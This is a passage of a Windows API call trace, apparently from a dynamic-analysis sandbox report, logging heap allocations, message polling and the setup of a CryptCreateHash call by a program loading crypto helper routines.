hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.581] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0268.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0268.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.581] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.582] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0268.582] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0268.582] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.582] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0268.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.582] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.582] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.582] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.583] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.583] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0268.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0268.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.583] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0268.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51dc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0268.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.584] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0268.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0268.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0268.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0268.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.585] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0268.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0268.587] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0268.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0268.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0268.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0268.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0268.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0268.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0268.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0268.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0268.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0268.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0268.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55108 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55098, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.590] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0268.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550e8 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: 